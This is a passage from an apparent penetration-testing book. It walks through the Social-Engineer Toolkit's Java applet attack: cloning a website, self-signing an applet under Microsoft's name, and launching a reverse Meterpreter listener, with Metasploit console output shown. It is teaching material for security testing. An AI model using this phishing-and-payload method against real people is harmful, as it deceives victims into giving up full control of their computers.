The Social-Engineer Toolkit
145
As with other SET attack methods, attackers can use a variety of pay-
loads. The default reverse Meterpreter payload is usually an excellent
selection. For this scenario, you can simply select the defaults when prompted
for the encoder to use and the port to use to reconnect.
With the configuration complete, SET launches Metasploit:
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 10.10.1.112:443
[*] Starting the payload handler...
msf exploit(handler) >
SET passes all necessary options to Metasploit, which then sets up the
reverse Meterpreter listener on port 443 .
NOTE
You have created a web server housing a cloned instance of
http://www.secmaniac
.com/
. If you had changed the configuration file to include
WEBATTACK_EMAIL=ON
, you
would have been prompted to send an email using the spear-phishing attack vector
(minus attachments).
Now that everything is set up, you simply need to get a target to browse
to the malicious site. Upon reaching the website, the target sees a pop-up
warning from the publisher, Microsoft, as shown in Figure 10-2. If the target
clicks Run, and most users will, the payload will be executed, and you gain
full control of the user’s system.
NOTE
Recall that SET’s configuration can self-sign the Java applet with whatever you want.
Remember, too, that when the target clicks Run and the payload is executed and deliv-
ered, the target is redirected to the legitimate SecManiac website.
Figure 10-2: Java applet prompt